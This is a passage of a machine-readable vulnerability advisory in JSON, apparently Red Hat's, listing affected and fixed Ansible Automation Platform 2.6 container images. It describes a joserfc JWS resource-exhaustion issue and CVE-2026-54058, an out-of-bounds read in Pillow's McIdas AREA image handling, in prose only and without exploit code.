"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads"
},
{
"cve": "CVE-2026-54058",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-07-14T17:02:34.864708+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500057"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. When an uncompressed McIdas AREA image is loaded from a filename through the mmap raw codec path, attacker-controlled header words can set a row stride smaller than the natural row width. Pixel access such as Image.tobytes(), getpixel, convert, or save can then read beyond the mapped region, disclosing adjacent process memory or causing a fault.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow is vulnerable to an out-of-bounds read when processing a crafted uncompressed McIdas AREA image via the mmap raw codec. A remote attacker who can supply such an image to a service that loads it without user interaction may disclose adjacent process memory or trigger a denial of service. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
